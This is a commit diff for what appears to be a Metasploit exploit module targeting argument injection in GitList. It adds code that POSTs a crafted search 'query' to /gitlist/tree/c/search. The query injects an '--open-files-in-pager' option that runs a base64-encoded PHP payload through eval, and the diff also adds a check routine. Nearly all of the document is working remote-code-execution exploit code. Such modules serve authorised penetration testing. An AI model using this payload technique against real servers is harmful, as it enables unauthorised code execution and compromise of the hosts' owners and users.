added http post and generating payload

modules/exploits/multi/http/gitlist_arg_injection.rb

@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
@@ -23,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'EDB', '44548' ]
         ],
-      'Platform'       => 'win',
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
           [ 'System or software version',
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'BadChars' => "\x00"
+          'BadChars' => "\x20"
         },
       'Privileged'     => false,
       'DisclosureDate' => "Apr 26 2018",
@@ -43,22 +43,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def make_request
-    uri = normalize_uri(target_uri.path)
+      postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+      php = %Q|<?php #{payload.encoded} ?>|
+      cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
+      cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
+      cmd << '\\"));"'
 
+      postRes = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => postUri,
+      'vars_post' => { 'query' => cmd }
+      )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, '/gitlist/')
     res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     =>  uri
     )
 
-    if res && res.code == 200
-      print_good(res.body)
-    else
-      print_error("Can't reach Gitlist")
+    unless res
+      return Exploit::CheckCode::Safe
     end
+
+    return Exploit::CheckCode::Detected if res.code == 200
   end
 
   def exploit
-    # Main function
     make_request
   end